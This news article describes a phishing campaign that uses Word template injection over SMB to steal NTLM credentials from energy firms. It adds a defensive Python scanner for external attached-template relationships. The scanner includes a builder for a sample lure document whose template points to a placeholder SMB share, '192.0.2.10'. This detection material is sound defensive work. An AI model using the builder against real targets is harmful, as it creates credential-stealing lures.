Phishing emails used to steal credentials from critical infrastructure firms can silently harvest those credentials without even using macros, researchers have warned.
Hackers are targeting energy companies, including those working in nuclear power, and other critical infrastructure providers with a technique that puts a new spin on a tried-and-tested form of cyberattack.
Phishing has long been a successful method of attack: cybercriminals craft a legitimate-looking email and send it to the intended victim with a malicious attachment. Once opened, the attachment runs code that drops malware, which can be used for ransomware, data theft or another form of attack.
But now attackers are running phishing campaigns without any malicious code embedded in the attachment. Instead, the attached document uses template injection: it references an external template that Word fetches over an SMB connection when the file is opened, and the attacker's server silently harvests credentials (the NTLM authentication data Windows sends when it connects to the share), according to researchers at Talos Intelligence.
While the attack method is currently only used to steal credentials, researchers warn that the same template mechanism could be employed to drop other malware.
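The technique described above leaves a recognisable trace inside the document itself: a .docx is a zip archive, and an attached template is declared as a relationship in word/_rels/settings.xml.rels. The following is an added example written for this page, not code from Talos or from the campaign: it constructs a minimal sample document in memory (the 192.0.2.10 address and Template.dotm filename are constructed placeholders, not indicators from the report), then scans any .docx for an external attached-template relationship and reports whether the target would be resolved over SMB.

```python
import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlparse

# Relationship type and package namespace defined by the OOXML standard.
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
OFFICE_DOCUMENT = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                   "relationships/officeDocument")
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def build_sample_docx(template_target=None):
    """Construct a minimal .docx in memory (a constructed sample for this example).
    If template_target is given, add the settings.xml.rels entry that template
    injection relies on: an External relationship of type attachedTemplate."""
    rel = ""
    if template_target is not None:
        rel = (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
               f'Target="{template_target}" TargetMode="External"/>')
    parts = {
        "[Content_Types].xml": (
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/></Types>'),
        "_rels/.rels": (
            f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{PKG_NS}">'
            f'<Relationship Id="rId1" Type="{OFFICE_DOCUMENT}" Target="word/document.xml"/>'
            '</Relationships>'),
        "word/document.xml": (
            f'<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="{W_NS}">'
            '<w:body/></w:document>'),
        # settings.xml points at the template by relationship id; the .rels file
        # holds the actual (possibly remote) location.
        "word/settings.xml": (
            f'<?xml version="1.0" encoding="UTF-8"?><w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
            + ('<w:attachedTemplate r:id="rId1"/>' if template_target else '')
            + '</w:settings>'),
        "word/_rels/settings.xml.rels": (
            f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{PKG_NS}">'
            f'{rel}</Relationships>'),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()


def external_template_targets(docx_bytes):
    """Return [(part, target)] for every attachedTemplate relationship whose
    TargetMode is External. Word will try to fetch each such target from the
    named location as soon as the document is opened, before any macro runs."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                if (rel.get("Type") == ATTACHED_TEMPLATE
                        and rel.get("TargetMode", "Internal") == "External"):
                    findings.append((name, rel.get("Target")))
    return findings


def fetched_over_smb(target):
    """True for targets Windows resolves as a network share (UNC paths, or file://
    URLs with a host part). Connecting to such a share triggers an NTLM
    authentication exchange with that host, which is the credential leak."""
    if target.startswith("\\\\"):
        return True
    parsed = urlparse(target)
    return parsed.scheme == "file" and bool(parsed.netloc)


def scan(docx_bytes):
    """Summarise a document: (part, target, reached_via_smb) per external template."""
    return [(part, target, fetched_over_smb(target))
            for part, target in external_template_targets(docx_bytes)]


if __name__ == "__main__":
    # Constructed sample: template hosted on an attacker-controlled SMB share.
    suspicious = build_sample_docx("file://192.0.2.10/Template.dotm")
    for part, target, smb in scan(suspicious):
        print(f"{part}: external template {target} (SMB: {smb})")
    print("clean document findings:", scan(build_sample_docx()))
```

The scanner only covers the attached-template relationship this campaign used; a fuller check would also inspect other External relationships (OLE objects, frames, hyperlinks) and the equivalent constructs in RTF. Whatever the document format, the mitigation is the same: Word needs no legitimate reason to load a template from the internet, so blocking outbound SMB (TCP 445) at the network edge stops the credential leak even when a user opens the lure.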
It’s the latest in a string of attacks involving SMB, although, unlike Petya or WannaCry, this one exploits no SMB vulnerability and has no known relation to EternalBlue, the leaked NSA Windows exploit that has been used to carry out global ransomware attacks.
Cyberattacks against critical infrastructure are not a new phenomenon, and since May 2017 hackers have been using this technique to target energy companies around the world, predominantly in Europe and the US, with the goal of stealing the credentials of those working in critical infrastructure. It’s not yet known who is behind the attacks or where they’re based.
Like other phishing campaigns, this attack uses emails relevant to the targets as a lure. In this instance, the emails often claim to be environmental reports or CVs and come with an attached Word document that attempts to harvest credentials when opened.